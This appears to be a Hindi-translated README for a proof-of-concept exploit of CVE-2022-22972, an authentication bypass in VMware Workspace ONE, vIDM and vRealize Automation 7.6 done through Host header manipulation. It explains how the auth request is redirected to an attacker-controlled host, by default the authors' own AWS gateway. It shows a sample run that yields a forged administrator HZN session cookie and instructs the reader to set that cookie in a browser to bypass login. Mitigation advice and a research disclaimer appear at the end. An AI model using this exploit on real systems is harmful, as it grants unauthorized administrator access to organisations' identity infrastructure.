
CVE-2022-22972 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो VMware Workspace ONE, vIDM, और vRealize Automation 7.6 में Host हेडर हेरफेर के माध्यम से प्रमाणीकरण को बायपास करता है।
VMware Workspace ONE, vIDM, और vRealize Automation 7.6 को प्रभावित करने वाले CVE-2022-22972 के लिए POC।
इस भेद्यता का तकनीकी मूल कारण विश्लेषण हमारे ब्लॉग पर पाया जा सकता है: https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive
यह स्क्रिप्ट CVE-2022-22972 का उपयोग करके vRealize Automation 7.6 पर प्रमाणीकरण बायपास करने के लिए इस्तेमाल की जा सकती है। Workspace ONE और vIDM के प्रमाणीकरण एंडपॉइंट अलग-अलग हैं, लेकिन इस भेद्यता का मूल वही रहता है। यदि आपके पास प्रवाह को सत्यापित करने के लिए परीक्षण लेख हैं, तो हम पुल रिक्वेस्ट स्वीकार करने में प्रसन्न होंगे।
यह स्क्रिप्ट VMware प्रमाणीकरण एंडपॉइंट के HTTP POST अनुरोध के Host हेडर को हमलावर द्वारा नियंत्रित Host में बदलकर काम करती है। इससे VMware एप्लिकेशन क्रेडेंशियल जानकारी के साथ उस Host से संपर्क करता है, और यदि Host 200 लौटाता है, तो उपयोगकर्ता सफलतापूर्वक प्रमाणित हो जाता है।
यह स्क्रिप्ट HZN कुकी उत्पन्न करती है, जिसे बाद के अनुरोधों में शामिल करके समझौता किए गए उपयोगकर्ता के रूप में कार्य किया जा सकता है।
नोट: स्क्रिप्ट के डिफ़ॉल्ट args प्रमाणीकरण अनुरोध को हमारे AWS API गेटवे पर भेजेंगे, जो ब्लॉग में उल्लिखित विशिष्ट एंडपॉइंट के लिए 200 का उत्तर देने के लिए कॉन्फ़िगर किया गया है। आप इसे --host विकल्प से बदल सकते हैं। यह एंडपॉइंट एक्सप्लॉइट प्रवाह के दौरान कोई संवेदनशील डेटा प्राप्त नहीं करेगा - केवल कमजोर एप्लिकेशन से नकली auth हेडर के साथ एक अनुरोध, जिसका वह उत्तर देता है।
dev@ubuntu:~/vmware/vra/exploit$ python3 CVE-2022-22972.py https://vra-app01.vra.intranet
Extracting state from vcac redirects...
Sending POST to auth endpoint
HZN=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJqdGkiOiJiM2E3MDJiOS01NjJkLTQwODgtYTg2Ny0xZjY5ZWE4YjAyZjMiLCJwcm4iOiJhZG1pbmlzdHJhdG9yQFZTUEhFUkUuTE9DQUwiLCJkb21haW4iOiJ2c3BoZXJlLmxvY2FsIiwidXNlcl9pZCI6IjMiLCJhdXRoX3RpbWUiOjE2NTM0MjUwOTAsImlzcyI6Imh0dHBzOi8vZWkzd3B0OTEwMC5leGVjdXRlLWFwaS51cy1lYXN0LTIuYW1hem9uYXdzLmNvbS9TQUFTL3QvdnNwaGVyZS5sb2NhbC9hdXRoIiwiYXVkIjoiaHR0cHM6Ly9laTN3cHQ5MTAwLmV4ZWN1dGUtYXBpLnVzLWVhc3QtMi5hbWF6b25hd3MuY29tL1NBQVMvdC92c3BoZXJlLmxvY2FsL2F1dGgvb2F1dGh0b2tlbiIsImN0eCI6Ilt7XCJtdGRcIjpcInVybjp2bXdhcmU6bmFtZXM6YWM6Y2xhc3NlczpMb2NhbFBhc3N3b3JkQXV0aFwiLFwiaWF0XCI6MTY1MzQyNTA5MCxcImlkXCI6M31dIiwic2NwIjoicHJvZmlsZSBhZG1pbiB1c2VyIGVtYWlsIG9wZXJhdG9yIiwiaWRwIjoiMiIsImVtbCI6ImFkbWluaXN0cmF0b3JAdnJhLWFwcDAxLnZyYS5pbnRyYW5ldCIsImNpZCI6IiIsImRpZCI6IiIsIndpZCI6IiIsInJ1bGVzIjp7ImV4cGlyeSI6MTY1MzQyNjg5MCwicnVsZXMiOlt7InJlc291cmNlcyI6WyIqIl0sImFjdGlvbnMiOlsiKiJdLCJjb25kaXRpb25zIjpudWxsfV0sImxpbmsiOm51bGx9LCJleHAiOjE2NTM0MjY4OTAsImlhdCI6MTY1MzQyNTA5MCwic3ViIjoiYWQzODkzODEtNTRmNS00ODFkLWFmNWEtOWZjNmIzOGI0NzQ0IiwicHJuX3R5cGUiOiJVU0VSIn0.Kkq2UnmqpW6yJb3GGCp7dSXc5PlU1y8YyDULIYLHIvYlB3OC4j5xFDy91a2tk4bi1lAUITymV-NUgweoCl15LXFVfBFYLEs-OAvMLKZhhGnFF-BrxmyYLPJutkxsi-gL0rF4VmYykuYw9tdUY2DghWiGGZ6QTYOts21QUzcvU-8
प्रमाणीकरण बायपास करने के लिए अपने ब्राउज़र में HZN कुकी सेट करें।
नवीनतम संस्करण में अपडेट करें या VMSA में दिए गए निर्देशों का पालन करके शमन करें।
यह सॉफ़्टवेयर विशुद्ध रूप से अकादमिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और यह स्पष्ट रूप से अधिकृत किए जाने को छोड़कर सिस्टम पर हमला करने के लिए उपयोग किए जाने के इरादे से नहीं है। परियोजना अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए ज़िम्मेदार या उत्तरदायी नहीं हैं। ज़िम्मेदारी से उपयोग करें।